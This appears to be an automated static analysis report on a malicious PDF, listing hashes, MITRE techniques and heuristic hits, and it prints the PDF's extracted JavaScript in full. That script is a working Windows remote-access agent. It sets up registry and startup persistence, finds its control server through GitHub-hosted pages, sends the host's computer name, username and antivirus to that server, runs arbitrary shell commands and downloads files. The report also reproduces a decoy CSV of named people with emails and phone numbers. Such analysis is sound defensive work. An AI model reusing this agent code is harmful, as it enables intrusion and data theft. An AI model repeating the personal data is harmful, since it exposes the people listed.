Malicious PDF — malware analysis report

Static analysis result for SHA-256 b26718879e677213…

MALICIOUS

PDF

32.0 KB First seen: 2021-06-17
MD5: 57d2d2c9eb067ad4f89ba8132a88b3e6 SHA-1: e7a3be7e51ffb3d120e8abe6db029da940655687 SHA-256: b26718879e677213519893d779ff5d655c85f3c1b66f9eb20f396c0f5000638b
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1105 Ingress Tool Transfer T1027 Obfuscated Files or Information T1566.001 Spearphishing Attachment

The PDF contains embedded JavaScript that is heavily obfuscated and uses techniques like String.fromCharCode and XOR evaluation. The script attempts to download and execute a second-stage payload from provided URLs, indicating an Ingress Tool Transfer (T1105) attack pattern. It also utilizes ActiveXObject and WScript.Shell, common for Windows scripting execution (T1059.007). The presence of obfuscation (T1027) and the nature of the payload suggest a malicious intent, likely for credential exfiltration or further system compromise. Given it's a PDF, Spearphishing Attachment (T1566.001) is the likely initial access vector.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 8

  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
     //p0b2x6
     return String.fromCharCode.apply\(String, bytes\);  //p0b2x6
    } //p0b2x6
  • PDF JavaScript WScript downloader high PDF_JS_WSCRIPT_DOWNLOADER
    Decoded PDF JavaScript reconstructs a Windows Script Host COM downloader using WScript.CreateObject plus XMLHTTP/ADODB.Stream style download, write, and run behavior. This is commodity payload delivery rather than a specific PDF parser CVE trigger.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript contains an unrendered phishing-kit placeholder low PDF_JS_TEMPLATE_PLACEHOLDER
    Embedded JavaScript still contains an unrendered template / mail-merge placeholder (e.g. {SYSLINK}, {{recipient}}, '[[-Email-]]'). A delivered document has these substituted; an unrendered token means the file IS the phishing-kit template whose per-recipient URL / personalisation never ran. Complements PDF_URL_MAILMERGE_PLACEHOLDER, which only inspects annotation URIs.
    Matched line in script
      } else { //p0b2x6
       id = get_page_content_with_ie(server + "/getid", "action=getSerial&computer_name="+WshShell.ExpandEnvironmentStrings("%computername%")+"&username="+WshShell.ExpandEnvironmentStrings("%username%")+"&version="+version+"&cli="+ref); //p0b2x6
       if(id.length == 16) { //p0b2x6
  • Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER
    PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://raw.githubusercontent.com/deadpooool/news/master/README.md Referenced by PDF JavaScript
    • https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.mdReferenced by PDF JavaScript
    • https://raw.githubusercontent.com/deadpooool/news/master/README.md','https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.mdReferenced by PDF JavaScript
    • https://raw.githubusercReferenced by PDF JavaScript

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0003_000.js pdf-javascript-stream PDF /JS object 3 at offset 0x75 31108 bytes
SHA-256: 6e6b3311264114f36c921a151c1cbba6171f6c0532e3de9aefed8b7997fb7ae8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 shell/COM execution token(s). Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
try {
  //p0b2x6
var WshShell = new ActiveXObject("WScript.Shell"); //p0b2x6
var fso = new ActiveXObject("Scripting.FileSystemObject"); //p0b2x6
var shellApp = new ActiveXObject("shell.application"); //p0b2x6
 //p0b2x6
version = "1.3" //p0b2x6
ref = "bd" //p0b2x6
 //p0b2x6
items = ['https://raw.githubusercontent.com/deadpooool/news/master/README.md','https://raw.githubusercontent.com/anvaperhdfjkdhud/1234/master/README.md']; //p0b2x6
StorageDir = WshShell.ExpandEnvironmentStrings("%localappdata%")+"\\Microsoft\\PackageCache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"; //p0b2x6
extracted_file = "200_Germany.csv    "; //p0b2x6
extracted_file_filesize = 12692              ; //p0b2x6
lnk_filesize = 21890              ; //p0b2x6
startup_shortcut = StorageDir + "\\services.lnk"; //p0b2x6
agent_location = StorageDir + "\\file.js"; //p0b2x6
agent_hidden_executer = StorageDir + "\\startup.js"; //p0b2x6
g3r = StorageDir + "\\g3r.reg"; //p0b2x6
agent_id_location = StorageDir + "\\id"; //p0b2x6
lckFile = StorageDir+"\\h.lck"; //p0b2x6
ieFile = StorageDir + "\\kill.js"; //p0b2x6
av = return_av_name(); //p0b2x6
pFolder = WshShell.ExpandEnvironmentStrings("%localappdata%")+"\\Python"; //p0b2x6
sctFile = pFolder+ "\\SC7.P7D"; //p0b2x6
pyFile = "main.py"; //p0b2x6
pyAlreadyRunning = 0; //p0b2x6
 //p0b2x6
if(av.length != av.replace("Kasper", "").length) //p0b2x6
{ //p0b2x6
	kasper = 1; //p0b2x6
} //p0b2x6
else //p0b2x6
{ //p0b2x6
	kasper = 0; //p0b2x6
} //p0b2x6
kasperWritten = 0; //p0b2x6
main(); //p0b2x6
 //p0b2x6
function main() { //p0b2x6
	if(WScript.ScriptFullName != agent_location) { //p0b2x6
		extract_and_run_decoy(); //p0b2x6
		create_storage_dir(); //p0b2x6
		create_ie_file(); //p0b2x6
		create_startup_executer(); //p0b2x6
		copy_agent_to_new_location(); //p0b2x6
		exec_cscript(agent_location); //p0b2x6
		delete_temp_files(); //p0b2x6
	} else { //p0b2x6
		lck = fso.CreateTextFile(lckFile, 1); //p0b2x6
		exec_cscript(ieFile); //p0b2x6
		main_loop(); //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function main_loop() { //p0b2x6
		var now = get_time(); //p0b2x6
		r3g(); //p0b2x6
		if(kasper == 1 && fso.FileExists(agent_id_location) == false && kasperWritten == 0) //p0b2x6
		{ //p0b2x6
			WshShell.Run("reg import "+g3r, 0, 1); //p0b2x6
			create_shortcut_in_startup(); //p0b2x6
			kasperWritten = 1; //p0b2x6
		} //p0b2x6
		else //p0b2x6
		{ //p0b2x6
			WshShell.Run("reg import "+g3r, 0, 1); //p0b2x6
			create_shortcut_in_startup(); //p0b2x6
 //p0b2x6
		} //p0b2x6
 //p0b2x6
		server = extract_srvaddr(); //p0b2x6
		try { //p0b2x6
			id = get_id(); //p0b2x6
			while(1) { //p0b2x6
				 //p0b2x6
				var passedsec = get_time()-now; //p0b2x6
				if(passedsec > 60*60){ //p0b2x6
					now = get_time(); //p0b2x6
					server = extract_srvaddr(); //p0b2x6
				} //p0b2x6
				 //p0b2x6
				command = get_page_content_with_ie(server + "/getcommand", "action=getCommand&uid="+id); //p0b2x6
				eval("obj=" +command); //p0b2x6
				if(obj.command.length > 0) { //p0b2x6
					if(obj.command.search('download') >= 0) { //p0b2x6
						var spl = obj.command.split('|'); //p0b2x6
						file = get_page_content_with_ie(server + "/dwnld?u="+spl[1], ""); //p0b2x6
						if(file.length > 0) { //p0b2x6
							bin_write(spl[2], hex2bin(file)); //p0b2x6
						} //p0b2x6
					} else { //p0b2x6
						WshShell.Run("cmd.exe /c " +obj.command, 0, 0); //p0b2x6
					} //p0b2x6
					WScript.Sleep(10000); //p0b2x6
				} else { //p0b2x6
					WScript.Sleep(30000); //p0b2x6
				} //p0b2x6
				 //p0b2x6
				if(fso.FileExists(pFolder+"\\"+pyFile) && pyAlreadyRunning == 0) { //p0b2x6
					oldWd = WshShell.CurrentDirectory; //p0b2x6
					WshShell.CurrentDirectory = pFolder; //p0b2x6
					 //p0b2x6
					pyAlreadyRunning = 1; //p0b2x6
					WshShell.Run("python.exe                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     "+pyFile, 0, 0); //p0b2x6
						 //p0b2x6
					WshShell.CurrentDirectory = oldWd; //p0b2x6
				} //p0b2x6
				 //p0b2x6
				if(fso.FileExists(sctFile)) { //p0b2x6
					sctb64 = base64_encode(sctFile); //p0b2x6
					screen = get_page_content_with_ie(server + "/zaqxswcde123456789", "action=sendScreenshot&uid="+id+"&data="+sctb64); //p0b2x6
					fso.DeleteFile(sctFile, 1); //p0b2x6
				} //p0b2x6
				 //p0b2x6
			} //p0b2x6
		} catch (e) { //p0b2x6
			WScript.Sleep(60000); //p0b2x6
			main_loop(); //p0b2x6
		} //p0b2x6
} //p0b2x6
 //p0b2x6
function get_id() { //p0b2x6
	id = ""; //p0b2x6
	while(id.length != 16) { //p0b2x6
		if(fso.FileExists(agent_id_location)) { //p0b2x6
			f = fso.OpenTextFile(agent_id_location, 1); //p0b2x6
			while (!f.AtEndOfStream) { //p0b2x6
				id += f.ReadLine(); //p0b2x6
			} //p0b2x6
			f.Close(); //p0b2x6
			up = get_page_content_with_ie(server + "/getid", "action=up&uid="+id+"&antivirus="+return_av_name()); //p0b2x6
		} else { //p0b2x6
			id = get_page_content_with_ie(server + "/getid", "action=getSerial&computer_name="+WshShell.ExpandEnvironmentStrings("%computername%")+"&username="+WshShell.ExpandEnvironmentStrings("%username%")+"&version="+version+"&cli="+ref); //p0b2x6
			if(id.length == 16) { //p0b2x6
				var s = fso.CreateTextFile(agent_id_location, true); //p0b2x6
				s.Write(id); //p0b2x6
				s.Close(); //p0b2x6
				up = get_page_content_with_ie(server + "/getid", "action=up&uid="+id+"&antivirus="+return_av_name()); //p0b2x6
			} //p0b2x6
		} //p0b2x6
		WScript.Sleep(30000); //p0b2x6
	} //p0b2x6
	return id; //p0b2x6
} //p0b2x6
 //p0b2x6
function get_page_content_with_ie(url, postdata) { //p0b2x6
	try{ //p0b2x6
		var ie = new ActiveXObject("InternetExplorer.Application"); //p0b2x6
		ie.Visible = 0; //p0b2x6
		if(postdata.length == 0) { //p0b2x6
			ie.Navigate(url); //p0b2x6
		} else { //p0b2x6
			ie.Navigate(url, "", "", stream_string_to_binary(postdata), "Content-Type: application/x-www-form-urlencoded"); //p0b2x6
		} //p0b2x6
		i = 0; //p0b2x6
		while(i < 60) { //p0b2x6
			if(ie.ReadyState == 4) { //p0b2x6
				i = 60; //p0b2x6
			} //p0b2x6
			WScript.Sleep(1000); //p0b2x6
			i = i + 1; //p0b2x6
		} //p0b2x6
		content = ie.document.body.innerHTML; //p0b2x6
		content = content.replace("&amp;", "&"); //p0b2x6
		content = content.replace("&gt;", ">"); //p0b2x6
		content = content.replace("&lt;", "<"); //p0b2x6
		content = content.replace('&quot;', '"'); //p0b2x6
		content = content.replace("<pre>", ""); //p0b2x6
		content = content.replace("</pre>", ""); //p0b2x6
		content = content.replace("<PRE>", ""); //p0b2x6
		content = content.replace("</PRE>", ""); //p0b2x6
		ie.Quit(); //p0b2x6
		delete ie; //p0b2x6
		return content; //p0b2x6
	} catch (e) { //p0b2x6
			return ''; //p0b2x6
		} //p0b2x6
} //p0b2x6
 //p0b2x6
function stream_string_to_binary(str) { //p0b2x6
	var BinaryStream = WScript.CreateObject('ADODB.Stream'); //p0b2x6
	BinaryStream.Type = 2; //p0b2x6
	BinaryStream.CharSet = "us-ascii" //p0b2x6
	 //p0b2x6
	BinaryStream.Open(); //p0b2x6
	BinaryStream.WriteText(str); //p0b2x6
	BinaryStream.Position = 0; //p0b2x6
	BinaryStream.Type = 1; //p0b2x6
	 //p0b2x6
	return BinaryStream.read(); //p0b2x6
} //p0b2x6
 //p0b2x6
function num2dot(num) { //p0b2x6
	var d = num%256; //p0b2x6
	for (var i=3; i>0; i--) { //p0b2x6
		num = Math.floor(num/256); //p0b2x6
		d = num%256+'.'+d; //p0b2x6
	} //p0b2x6
	return d; //p0b2x6
} //p0b2x6
 //p0b2x6
function get_time() { //p0b2x6
	var date = new Date(); //p0b2x6
	return date.getTime()/1000|0; //p0b2x6
} //p0b2x6
 //p0b2x6
function extract_srvaddr() { //p0b2x6
	serverFound = false; //p0b2x6
	pattern = 'our news start at (.*) thank you'; //p0b2x6
	while(serverFound == false) { //p0b2x6
		var item = items[Math.floor(Math.random()*items.length)]; //p0b2x6
		var html = get_page_content_with_ie(item,''); //p0b2x6
		if(html != '') { //p0b2x6
			var match = extract_string(pattern, html); //p0b2x6
			if(match != null) { //p0b2x6
				srv = num2dot(match[1]/666); //p0b2x6
				srv = srv + "/Validate"; //p0b2x6
				srv_stat = get_page_content_with_ie(srv+"/ValSrv", ''); //p0b2x6
				validate_str = extract_string('youwillnotfindthisanywhare', srv_stat); //p0b2x6
				if(validate_str == 'youwillnotfindthisanywhare') { //p0b2x6
					serverFound = true; //p0b2x6
					return srv; //p0b2x6
				} //p0b2x6
			} //p0b2x6
		} //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function extract_string(pattern, str) { //p0b2x6
	if(pattern != '' && str != '') { //p0b2x6
		try { //p0b2x6
			re = new RegExp(pattern, 'i') //p0b2x6
			match = str.match(re); //p0b2x6
			return match; //p0b2x6
		} catch (e) { //p0b2x6
			return null; //p0b2x6
		} //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function r3g() { //p0b2x6
	var s = fso.CreateTextFile(g3r, true); //p0b2x6
	s.WriteLine('Windows Registry Editor Version 5.00'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]'); //p0b2x6
	s.WriteLine('"run"="' +StorageDir.replace(/\\/g, "\\\\")+ '\\\\services.lnk"'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Control Panel\\Cursors]'); //p0b2x6
	s.WriteLine('"AppStarting"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,63,00,75,00,72,00,73,00,6f,00,72,00,73,00,5c,00,61,00,65,00,72,00,6f,00,5f,00,61,00,72,00,72,00,6f,00,77,00,2e,00,63,00,75,00,72,00,00,00'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]'); //p0b2x6
	s.WriteLine('"Check_Associations"="no"'); //p0b2x6
	s.WriteLine('"NoProtectedModeBanner"=dword:00000001'); //p0b2x6
	s.WriteLine('"IE10RunOncePerInstallCompleted"=dword:00000001'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Recovery]'); //p0b2x6
	s.WriteLine('"AutoRecover"=dword:00000002'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\PhishingFilter]'); //p0b2x6
	s.WriteLine('"EnabledV9"=dword:00000001'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation]'); //p0b2x6
	s.WriteLine('"MSCompatibilityMode"=dword:00000001'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced]'); //p0b2x6
	s.WriteLine('"EnableBalloonTips"=dword:00000000'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings]'); //p0b2x6
	s.WriteLine('"GlobalUserOffline"=dword:00000000'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3]'); //p0b2x6
	s.WriteLine('"2500"=dword:00000003'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.WriteLine('[HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner]'); //p0b2x6
	s.WriteLine('"BrowserMonitoring"=-'); //p0b2x6
	s.WriteLine('"(Mon)3001"=-'); //p0b2x6
	s.WriteLine(''); //p0b2x6
	s.Close(); //p0b2x6
} //p0b2x6
 //p0b2x6
function return_av_name() { //p0b2x6
	try { //p0b2x6
		var oWMISrvc = GetObject("winmgmts:\\\\.\\root\\cimv2"); //p0b2x6
		var colOperatingSystems = oWMISrvc.ExecQuery("SELECT * FROM Win32_OperatingSystem"); //p0b2x6
		 //p0b2x6
		var objItem = new Enumerator(colOperatingSystems);	 //p0b2x6
		for(;!objItem.atEnd();objItem.moveNext()) { //p0b2x6
			var version = objItem.item().Version.substr(0,3); //p0b2x6
		} //p0b2x6
		objWMIService = ""; //p0b2x6
		try { //p0b2x6
			var objWMIService = GetObject("winmgmts:\\\\.\\root\\SecurityCenter"); //p0b2x6
 //p0b2x6
		} catch(e) {} //p0b2x6
			try { //p0b2x6
				var objWMIService = GetObject("winmgmts:\\\\.\\root\\SecurityCenter2"); //p0b2x6
			} catch (e) {} //p0b2x6
				if (typeof(objWMIService) == "string") //p0b2x6
				{ //p0b2x6
					return 'N/A'; //p0b2x6
				} //p0b2x6
				var colItems = objWMIService.ExecQuery("SELECT displayName FROM AntiVirusProduct", "WQL"); //p0b2x6
				 //p0b2x6
				var enumItems = new Enumerator(colItems); //p0b2x6
				name = ""; //p0b2x6
				for (;!enumItems.atEnd();enumItems.moveNext()) { //p0b2x6
					name = enumItems.item().displayName+" and "+name; //p0b2x6
				} //p0b2x6
				 //p0b2x6
				if(name != null && name != '') { //p0b2x6
					return name; //p0b2x6
				} else { //p0b2x6
					return 'N/A'; //p0b2x6
				} //p0b2x6
	} catch (e) { //p0b2x6
		return 'N/A'; //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function CreateFolderRecursive(FullPath) { //p0b2x6
	var arr = [], dir = [], path = [] //p0b2x6
	 //p0b2x6
	arr = FullPath.split("\\"); //p0b2x6
	path = ""; //p0b2x6
	for(index=0; index<arr.length; ++index) { //p0b2x6
		if(path != "") //p0b2x6
			path = path+"\\"; //p0b2x6
		path = path+""+arr[index]; //p0b2x6
		if(!fso.FolderExists(path)) { //p0b2x6
			try { //p0b2x6
				fso.CreateFolder(path); //p0b2x6
			} catch (e) { //p0b2x6
			} //p0b2x6
		} //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function copy_agent_to_new_location() { //p0b2x6
	fso.CopyFile(WScript.ScriptFullName, agent_location); //p0b2x6
} //p0b2x6
 //p0b2x6
function create_startup_executer() { //p0b2x6
	var s = fso.CreateTextFile(agent_hidden_executer, true); //p0b2x6
	s.WriteLine('var WshShell = new ActiveXObject("WScript.Shell");'); //p0b2x6
	s.WriteLine('WshShell.Run("C:\\\\Windows\\\\System32\\\\cscript.exe                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    '+agent_location.replace(/\\/g, "\\\\")+'", 0, 0);'); //p0b2x6
	s.Close(); //p0b2x6
} //p0b2x6
 //p0b2x6
function create_shortcut_in_startup() { //p0b2x6
	var oShellLink = WshShell.CreateShortcut(startup_shortcut);  //p0b2x6
	oShellLink.TargetPath = "%comspec%";  //p0b2x6
	oShellLink.Arguments = "/c cscript "+agent_hidden_executer;  //p0b2x6
	oShellLink.WindowStyle = 7;  //p0b2x6
	oShellLink.WorkingDirectory = StorageDir;  //p0b2x6
	oShellLink.Save(); //p0b2x6
} //p0b2x6
 //p0b2x6
 //p0b2x6
function create_storage_dir() { //p0b2x6
	if(!fso.FolderExists(StorageDir)) { //p0b2x6
		CreateFolderRecursive(StorageDir); //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function create_ie_file() { //p0b2x6
	if(!fso.FileExists(ieFile)) { //p0b2x6
		var s = fso.CreateTextFile(ieFile, true); //p0b2x6
		s.WriteLine(unescape("var%20oWMISrvc%20%3D%20GetObject%28%22winmgmts%3A%5C%5C%5C%5C.%5C%5Croot%5C%5Ccimv2%22%29%3Bwhile%281%29%7BWScript.Sleep%28180000%29%3B%20cProcNIE%28%29%3B%7Dfunction%20cProcNIE%28%29%20%7Btry%20%7Bvar%20colProcLst%20%3D%20oWMISrvc.ExecQuery%28%22SELECT%20*%20FROM%20Win32_Process%20WHERE%20CommandLine%20LIKE%20%27%25-Embedding%25%27%20AND%20Name%20%3D%20%27iexplore.exe%27%22%29%3Bvar%20objItem%20%3D%20new%20Enumerator%28colProcLst%29%3Bfor%28%3B%21objItem.atEnd%28%29%3BobjItem.moveNext%28%29%29%20%7Bvar%20p%20%3D%20objItem.item%28%29%3Bp.Terminate%28%29%3B%7D%7D%20catch%20%20%28e%29%20%7B%7D%7D")); //p0b2x6
		s.Close(); //p0b2x6
	} //p0b2x6
} //p0b2x6
 //p0b2x6
function extract_file(src, dest, start, file_size) { //p0b2x6
	var oFile = fso.GetFile(src); //p0b2x6
	var oRead = oFile.OpenAsTextStream(); //p0b2x6
	data = oRead.Read(oFile.Size); //p0b2x6
	oRead.Close(); //p0b2x6
	offset_data = data.substr(start+1, file_size); //p0b2x6
	var wFile = fso.OpenTextFile(dest, 2, true); //p0b2x6
	wFile.Write(offset_data); //p0b2x6
	wFile.Close(); //p0b2x6
} //p0b2x6
 //p0b2x6
function delete_temp_files() { //p0b2x6
	fso.DeleteFile(WScript.arguments(0), 1); //p0b2x6
	fso.DeleteFile(WScript.ScriptFullName, 1); //p0b2x6
} //p0b2x6
 //p0b2x6
function extract_and_run_decoy() { //p0b2x6
	extract_file(WScript.arguments(0), extracted_file, lnk_filesize, extracted_file_filesize); //p0b2x6
	WshShell.Run("cmd.exe /c "+extracted_file, false, false); //p0b2x6
} //p0b2x6
 //p0b2x6
function exec_cscript(path) { //p0b2x6
	WshShell.Run("cscript.exe                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     "+path, false, false); //p0b2x6
} //p0b2x6
 //p0b2x6
function base64_encode(path) { //p0b2x6
	var inputStream = new ActiveXObject('ADODB.Stream'); //p0b2x6
	inputStream.Open(); //p0b2x6
	inputStream.Type = 1; //p0b2x6
	inputStream.LoadFromFile(path); //p0b2x6
	var bytes = inputStream.Read(); //p0b2x6
	var dom = new ActiveXObject('Microsoft.XMLDOM'); //p0b2x6
	var elem = dom.createElement('tmp'); //p0b2x6
	elem.dataType = 'bin.base64'; //p0b2x6
	elem.nodeTypedValue = bytes; //p0b2x6
	return elem.text.replace(/[^A-Z\d+=\/]/gi, ''); //p0b2x6
} //p0b2x6
 //p0b2x6
function bin_write(path, bin_data) { //p0b2x6
	var BinaryStream = WScript.CreateObject("ADODB.Stream"); //p0b2x6
	BinaryStream.Type = 2; //p0b2x6
	BinaryStream.Charset = "ISO-8859-1"; //p0b2x6
	BinaryStream.Open(); //p0b2x6
	BinaryStream.WriteText(bin_data); //p0b2x6
	BinaryStream.SaveToFile(path, 2); //p0b2x6
	BinaryStream.Close(); //p0b2x6
} //p0b2x6
 //p0b2x6
function hex2bin(hex) { //p0b2x6
	var bytes = [], str; //p0b2x6
 //p0b2x6
	for(var i=0; i< hex.length-1; i+=2) //p0b2x6
		bytes.push(parseInt(hex.substr(i, 2), 16)); //p0b2x6
 //p0b2x6
	return String.fromCharCode.apply(String, bytes);	 //p0b2x6
} //p0b2x6
 //p0b2x6
Marcel,Kressner,Marcelkressner@gmx.de,Germany,(490359) 650-8990
Peter,Klein,klein-peter@freenet.de,Germany,(49) 938-4367
Oleg,Semenov,oleg.semenov@gmx.de,Germany,(1763) 867-4881
Sigmar,Meister,sigmarmeister@gmx.de,Germany,(4901511) 731-7333
Hans,Baumgarten,supertrader@hushmail.com,Germany,(494) 061-7345
Simon,Blessing,simonblessing1@web.de,Germany,(49171) 755-8414
Bernd,Schaefer Sell,berndaushamburg@gmx.de,Germany,(49403) 093-1971
Thilo,Bode,tebe74@googlemail.com,Germany,(49173) 384-4308
Sergej,Stenkin,sergejstenkin@freemail.ru,Germany,(4905641) 748-3361
Valerij,Spickov,walspick@unitybox.de,Germany,(49316) 660-4966
Mike,Grohmann,platafinanz@yahoo.de,Germany,(49305) 163-9935
Rainer,Ludwig,rainerludwig@gmx.net,Germany,(49171) 336-8353
Ulrich,Sperlich,ulrich.sperlich@gmx.de,Germany,(4901535) 380-9513
Steven,Goet,s.goet@web.de,Germany,(4904103) 317-3066
Kumar,Raja,romaraja@hotmail.com,Germany,(160) 733-6190
Hans,Schuldt,HansSchuldt@freenet.de,Germany,(491513) 805-8473
Alexei,Frank,novum_futurum@web.de,Germany,(491573) 816-3543
Meike + Bjoern,Neubauer,meike.bjoern.neubauer@t-online.de,Germany,(49573) 570-9830
Max,Dieringer,max.amir@me.com,Germany,(497115) 764-1334
Tanja,Lau,Lau.Tanja@gmx.de,Germany,(491577) 890-6843
Kevin,Leineweber,KevinLeineweber@gmx.de,Germany,(490049178) 408-6330
Alexander,Kaiser,bigalex77@hotmail.com,Germany,(491766) 103-5114
Christopher,Beyer,C.beyer1@gmx.net,Germany,(490177) 680-5651
Hendrik,Ehlert,hendrik@mehlert-online.de,Germany,(490338) 380-5030
Christian,Bader,badx@gmx.net,Germany,(1533) 757-4469
Stanislaw,Garbacz,stani456@googlemail.com,Germany,(4915771577) 304-7300
Bjoern,Hillers,hilli1970@googlemail.com,Germany,(491764) 134-9816
Curt,Nelsson,curtn@web.de,Germany,(4901578) 849-1843
Sonja & Carsten,Koepke,carstenkoepke3003@yahoo.de,Germany,(4991555985) 361-5800
Valentin,Kolaberdin,valentin@kolaberdin.com,Germany,(491577) 534-0734
Hinrich,Hoernlein Rummel,hhr@prophymed.com,Germany,(490171) 543-7439
Robin,Kosalla,RobinKosalla@googlemail.com,Germany,(49173) 965-3944
Tobias,Feigel,tobias.feigel@web.de,Germany,(49177) 735-1553
Christian-Johannes,Henrich,henrich.business@gmail.com,Germany,(490049163) 394-5150
Juergen,Robert,vk.lauterbach@yahoo.de,Germany,(49163) 343-9665
Augustin,Yimbi,ayimbi@gmx.de,Germany,(493331) 635-4543
Tanja,Mayfurth,tanjamayfurth@hotmail.com,Germany,(49163) 494-3103
Rolf Juergen,Vosseler,rolf.vosseler@t-online.de,Germany,(49485) 383-9404
Harald,Henrich,haraldhenrich0@gmail.com,Germany,(49633) 595-9700
Andreas,Schmitt,andreas_schmitt@live.com,Germany,(49891) 895-9659
Marcel,Schaefer,mas.main@googlemail.com,Germany,(491) 737-4466
Markus,Rechlin,markusrechlin@gmail.com,Germany,(49506703314) 334-8000
Ray (Rainer),Schrader,tipo48@googlemail.com,Germany,(4906753) 131-3609
Nikolaos,Kiparissis,nikos_ctp@hotmail.com,Germany,(1609) 443-3901
Marco,Wirges,marco.wirges@me.com,Germany,(49685) 396-0370
Sabine,Reineke herbst,zockerei@safux.de,Germany,(491768) 113-9113
Karl,Raase,inter-nett@gmx.de,Germany,(49537730334) 844-5000
Bjoern,Ohle,ohleb@yahoo.de,Germany,(49511) 303-3013
Patrick,Gutzmann,ilmyl@me.com,Germany,(491511) 653-9867
AHMET,BATAN,arcob38@windowslive.com,Germany,(490533) 513-1370
Xep,Vu Thi,xep47de@yahoo.de,Germany,(4901530) 777-4759
Hendrik,Schulze,stucan@gmx.de,Germany,(4901577) 170-7184
Gregor,Przeworski,gregor.przeworski@targobank.de,Germany,(491765) 510-6889
Katja,Hebestreit,katjahebestreit@yahoo.de,Germany,(491763) 678-4463
Alex,Huebgen,alexhue.trade@gmail.com,Germany,(496831) 307-1114
Alexander,Alert,alert76@googlemail.com,Germany,(493333) 600-9404
Juergen,Luebke,trader3108@freenet.de,Germany,(495319) 497-7376
Kim,Schwarzkopf,schwarzkopf.k@gmx.net,Germany,(496033) 987-1143
Jeana,Hauswald,jeana_haus@hotmail.de,Germany,(493117) 311-7936
Fabio,Frentzen,Fabio.Frentzen@web.de,Germany,(491578) 656-3768
Alexander,Eichler,airalex@hotmail.de,Germany,(491763) 066-3609
Ewald,Riedel,3683969@online.de,Germany,(490747) 591-4669
Stephan,Schwenke beust,sschwenke@gmx.de,Germany,(494151) 879-4714
Werner,Lenz,1aprovit@live.de,Germany,(491530) 639-9553
Wolfgang,Buschek,wolfib@gmx.de,Germany,(490911) 801-9003
Lukas,Schreiber,kontakt@trade-the-forex.de,Germany,(49173) 767-9418
Marc,Dornieden,Marc.Dornieden@googlemail.com,Germany,(49531) 317-0565
Andreas,Treptow,forex@andreas-treptow.de,Germany,(49630) 179-8670
Birgit,Finke,finke-birgit@t-online.de,Germany,(49175) 376-7351
Manfred,Paulun,manfred@paulunyland.de,Germany,(49453) 638-1671
Lars,Macario,lars.macario@gmail.com,Germany,(49171) 637-6999
Fawad,Amin,fawadamin3011@yahoo.de,Germany,(49309) 148-7670
Piyaphong,Saikamthon,onnoskish@hotmail.com,Germany,(49309) 981-3519
Jessica,Friesen,friesenjessica@gmx.de,Germany,(49178) 143-3506
Max,Lesemann,m.lesemann@posteo.de,Germany,(49173) 300-0000
Heiko,Klabes,heikoklabes@yahoo.de,Germany,(49349) 655-5001
